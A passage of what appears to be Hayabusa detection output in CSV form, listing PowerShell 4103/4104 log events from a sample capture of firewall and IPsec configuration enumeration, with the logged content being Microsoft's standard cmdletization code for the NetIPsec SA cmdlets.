[ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecQuickModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.129 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.129 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.129 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.129 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.129 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecQuickModeSA""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.129 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecQuickModeSA""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.129 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetIPsecQuickModeSA ",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.129 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetQuickModeSA' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecQuickModeSA' function Remove-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecMainModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecQuickModeSA'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.129 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.129 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.129 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Remove-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecMainModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.129 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetFirewallSetting ",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.145 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.145 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.145 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" 